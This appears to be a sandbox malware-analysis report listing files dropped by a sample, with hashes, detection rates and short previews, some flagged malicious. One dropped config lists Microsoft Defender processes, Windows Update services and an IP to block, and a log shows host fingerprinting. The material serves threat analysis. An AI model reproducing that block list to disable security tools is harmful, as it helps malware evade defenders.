                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_actcpao1.kt3.ps1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b1mfdzss.bjv.ps1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ebgn3tjo.qtv.psm1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gmgjwo55.x4e.psm1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mi1gil4y.nsl.ps1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o1o2y45g.mdg.psm1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oevjvekl.wcu.ps1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rvv1m5ii.01a.psm1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rxpcr3rk.rzv.ps1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_svygozhu.2z0.psm1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wy0a1vof.yoo.ps1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Local\Temp\installer.log

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3745
                                                                                                                                                Entropy (8bit):5.5088592721875305
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:i68J9VLDT0HU0Hn0H1QE0He0H+kQHR3VPzFW0HMVVHBHR0HMttHMH:/OT/T000H0GE0+0TQxlPzFW0AVhx0Ct2
                                                                                                                                                MD5:1A6D604458150AD8DA33BDD29F3B84BB
                                                                                                                                                SHA1:99A4E1994A0E4B868EBBBB838DC7EB342F2B8CBC
                                                                                                                                                SHA-256:76CC45F29FAE72234E83A0986C78366F5B5CF711F55C60B118EA9EA3C72070C7
                                                                                                                                                SHA-512:19C7A4793D6E1C74C53C4E6DFC2AEA28F3514EEAEF462B44093DF4108F245FCBB9437C9663A5104866F58023A004C3A0361E06F6B47E5D56F86B1A4D41C1973F
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\user\AppData\Local\Temp\installer.log)..[I] (debug_init) -> Done..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ff8c8850000)..[D] (module_get_proc) -> Done(hnd=0x00007ff8c8850000,name=RtlGetVersion,ret=0x00007ff8c888e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=934d772a)..[I] (sys_init) -> Done(sys_uid=c76a8f08934d772a,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (fs_path_expand) -> Done(path=%PUBLIC%,xpath=C:\Users\Public,xpath_sz=15)..[I] (fs_dir_create) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,recursive=1)..[D] (fs_attr_get) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3aea-1

                                                                                                                                                C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\cZO.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):10669056
                                                                                                                                                Entropy (8bit):7.443816651911507
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:98304:RzfenAfcSl0KeEoTnZ4gBu8P1TAB3ruLIb9ly73Ji3vhqNDMmL98fjd3KiY9LeOm:gA/0F5PdyrlSQ5qNDMmYjd3RY9Lesc
                                                                                                                                                MD5:2F829F1CB631D234C54F2E6C6F72EB57
                                                                                                                                                SHA1:BD76CB633ED42E9E94580E1D995AF2E36D9E1A11
                                                                                                                                                SHA-256:09B3B106A22BCB2DF3F09C7A1A082F2FE62927C337C183D3813D21513FB3FA43
                                                                                                                                                SHA-512:71C0B077AA63B6DF3A1C2E0A1A0E179DA0466518F2BE6E10871642F03B3B8F63318258DA8C93B78E0CA45C753C3A6524751187FF3D5952D336BE3461651D0CD9
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................*......................@.............................@.......6....`... ................................................................d............0..............................`...(....................................................text...............................`..`.data....J.......L..................@....rdata...^...P...`...<..............@..@.pdata..d...........................@..@.xdata..............................@..@.bss....p...............................idata.............................@....CRT....`..........................@....tls......... .....................@....reloc.......0.....................@..B................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\cZO.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):98304
                                                                                                                                                Entropy (8bit):6.298274541598319
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:EJm0mRQUtrg7DYy+F2aQuuvL7V0Y91n1ot:EJmjSUtMiF2suvVr11ot
                                                                                                                                                MD5:319865D78CC8DF6270E27521B8182BFF
                                                                                                                                                SHA1:716E70B00AA2D154367028DE896C7D76C9D24350
                                                                                                                                                SHA-256:A78945E7532ECDB29B9448A1F3EEF2F45EC2F01CA070B9868258CBCD31EAC23F
                                                                                                                                                SHA-512:78CD48C8BA558DFFC204A70DBFF13889984F80F268A715FEC7FC018A7718A11822975F775D44A927C5815AA2CCC0D78502264354BF5D8C0502B5A0A323948611
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.....|.................@....................................#7....`... ..............................................................................................................a..(....................... ............................text...............................`..`.data...............................@....rdata...R... ...T..................@..@.pdata...............R..............@..@.xdata...............\..............@..@.bss....0................................idata...............f..............@....CRT....`............z..............@....tls.................|..............@....reloc...............~..............@..B................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\wfpblk.ini

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe
                                                                                                                                                File Type:Generic INItialization configuration [svc]
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):195
                                                                                                                                                Entropy (8bit):4.692426693515089
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:PCLtupyhdA5A1XJy31ae0CYUAM9t2X0DwL1Uy/5ookVqEfokH2VmM74osLSgRUYp:PItZLJ4aZC9b/EhUyBjZBkWESqj
                                                                                                                                                MD5:E025B58CB2D118FAFAE00850EE91C5F9
                                                                                                                                                SHA1:DD23CE328F593AF74455F2C2F805B662466A1205
                                                                                                                                                SHA-256:897FC59CEDFBCAFDB9D0BEFEE9FC21A1B4C61259992A40F1986921E406E36340
                                                                                                                                                SHA-512:5CD3F72CB1FF5754F3329A1EF1C7D45826BE48540AAD60FC55B91C7EFDCBBEF8B6BEB66ED7E2CF338348CE3C43DE2C8B2C0E72C681A8C314ADBAE0F844C7B7EF
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[app]..MsMpEng.exe=1..MsSense.exe=1..SenseIR.exe=1..SenseNdr.exe=1..SenseCncProxy.exe=1..SenseSampleUploader.exe=1..[svc]..wuauserv=1..DoSvc=1..UsoSvc=1..WaaSMedicSvc=1..[ip4]..54.243.255.141=1..

                                                                                                                                                C:\Users\user\AppData\Local\Temp\wfpblk.log

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):21915
                                                                                                                                                Entropy (8bit):5.097909774076672
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:abbEbNQ6s69WS8vv88o88888888888888j8888888888e88888880888888888AA:abbEbNQ6s69WS8vv88o888888888888v
                                                                                                                                                MD5:DC054B75BDFB351BDF2328E6851D328E
                                                                                                                                                SHA1:2A9E461CFEECC61E9E708BEFAD840DC413CB851E
                                                                                                                                                SHA-256:3F9EC2FB04F5FFEFED7E0245E0BB2BE99E03CAF7F960961EC9DF05F5D4CA1CC4
                                                                                                                                                SHA-512:D73E56AA3D6EDB791628B300616F07C0CE2FA7F24C19470A2958D0E647E226DCF6FDA3EAB97B2103A3D25D32E70FC24C7CE9DFF49C48182933663DDB1D0D7AD5
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\user\AppData\Local\Temp\wfpblk.log)..[I] (debug_init) -> Done..[I] (fs_file_write) -> Done(path=C:\Users\user\AppData\Local\Temp\wfpblk.ini,mode=wb,buf_sz=195)..[I] (fs_file_read) -> Done(path=C:\Users\user\AppData\Local\Temp\wfpblk.ini,buf_sz=195)..[I] (ini_load) -> Done(path=C:\Users\user\AppData\Local\Temp\wfpblk.ini)..[D] (ini_get_sec) -> Done(name=app)..[D] (ini_get_sec) -> Done(name=app)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=[System Process],err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=System,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=Registry,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=smss.exe,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=csrss.exe,err=00000003)..[D] (ini_get_sec) ->

                                                                                                                                                C:\Windows\Temp\EgwqOk24

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):129536
                                                                                                                                                Entropy (8bit):6.2852879161990645
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:UmeFYyUJdEqzx2LVJ4ngXsNXGRqnbxeGqS/h0E0P3j4NBtRLBhBr:UZUJdhxCJ4ngg46weh0dr4vnV
                                                                                                                                                MD5:88E6178B0CD434C8D14710355E78E691
                                                                                                                                                SHA1:F541979CAD7EE7C6D8F2B87A0F240592A5DC1B82
                                                                                                                                                SHA-256:7B40349481AD6C522A23FB3D12D6058EC0A7C5B387348FB4AE85135EE19C91A4
                                                                                                                                                SHA-512:C4330A9EE1E69785420AABCFD1991AAAEB0F1764EB7E857F0C86161F61E1FFD467B458A2D458D3C55BB76D00F26FAC481D026443AB0796D0AEF38BF06CD84B8F
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*.<..........Y.........,...................................../*....`... ...................................... ..^....0..D............................p..l...............................(...................p5...............................text....:.......<..................`..`.data........P.......@..............@....rdata.......`.......B..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^.... ......................@..@.idata..D....0......................@....CRT....X....P......................@....tls.........`......................@....reloc..l....p......................@..B........................................................................................................................................................................

                                                                                                                                                C:\Windows\Temp\GEGgzh0s

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):37376
                                                                                                                                                Entropy (8bit):5.7181012847214445
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
                                                                                                                                                MD5:E3E4492E2C871F65B5CEA8F1A14164E2
                                                                                                                                                SHA1:81D4AD81A92177C2116C5589609A9A08A5CCD0F2
                                                                                                                                                SHA-256:32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
                                                                                                                                                SHA-512:59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                C:\Windows\Temp\GmdNT1AN

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):105984
                                                                                                                                                Entropy (8bit):6.285421743969757
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:BQrD6CCk73WUJ/2WEvooF8VohjBdmaKqYdpFXaRQSCYA8CSs8qgu06wCYA8CSs8V:BA6sDl/2WEvo0DipFXaRQO
                                                                                                                                                MD5:6E01ED70D02CE47F4D27762A9E949DEE
                                                                                                                                                SHA1:32B9199EBBD7891CF0091B96BF3B2C9303AB7B7A
                                                                                                                                                SHA-256:EFB9B3D4356071EE8FE66979140E7435371EC668088A68786C6FDCEDF29D7376
                                                                                                                                                SHA-512:B21C8F79553EE513F6C48EFA618C20FB82CBC77EDE95579C28C21D8BB433B93D108CEF442B48ECBDABD0B06AA5C8AEDC8B26316167D1793A0E972B38D4210854
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........................................@............`... .........................................^.......................T............0..h...............................(.......................`............................text...............................`..`.data........ ......................@....rdata..Pc...0...d..................@..@.pdata..T............n..............@..@.xdata...............x..............@..@.bss.... ................................edata..^...........................@..@.idata..............................@....CRT....X...........................@....tls......... ......................@....reloc..h....0......................@..B........................................................................................................................................................................

                                                                                                                                                C:\Windows\Temp\I77yQ5in

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):115712
                                                                                                                                                Entropy (8bit):6.193969228624904
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:55YoK6WOBqFp//wVUE/+TGAf5EkgE1duJmwTxOd/lZ1pgX7:55YoSb/Iv/+TNf5Ee1YLTxOd9Z16X7
                                                                                                                                                MD5:EC9499EE84ED09B77BE0A35EC87B781C
                                                                                                                                                SHA1:4148D40284BAB415DDB828BD4061A4FE93C9AF26
                                                                                                                                                SHA-256:5E38EA7E3DD96FE1C6BB2EBA38C7BDE638C6B6E7898F906E343D9500AFF86499
                                                                                                                                                SHA-512:D65933B825419719021D0D2F43B45616A5B1238550BFDC72D2F4F148E284E9FE488417021A45B6D2F61770E31150B3331B1071AFE7EBB85AF6B379D040A9BEBC
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........."h.............................P......JA....`... .........................................^....................................@..l...............................(.......................h............................text...x...........................`..`.data........0....... ..............@....rdata.. d...@...f...*..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B........................................................................................................................................................................

                                                                                                                                                C:\Windows\Temp\Mtj0dqVw

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):75977
                                                                                                                                                Entropy (8bit):7.8696816318811385
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:07klNoOPsg0evjAYqVwbLhhOW6xwz0U0paUgfVnsHk:EkPNPmevj5qabL9ydgNz
                                                                                                                                                MD5:E53A179BB45CD7EDD8371740D65076BD
                                                                                                                                                SHA1:6B74034746E12C2058614A9DF671C31B79EAA7E9
                                                                                                                                                SHA-256:C33D095DBFFC43047A7930EB0811B11208D166FCFD612D8ED32556A6CE82B9DB
                                                                                                                                                SHA-512:767105F8B88CD8C9E4E2BD9188C8174D5FD86D370D2E6A79B0E10EF4A79E994F24F8DB7A79C481B97F69DBEA8E311590E3B2D31E804EC5F572A3C37CF3EBC457
                                                                                                                                                Malicious:false
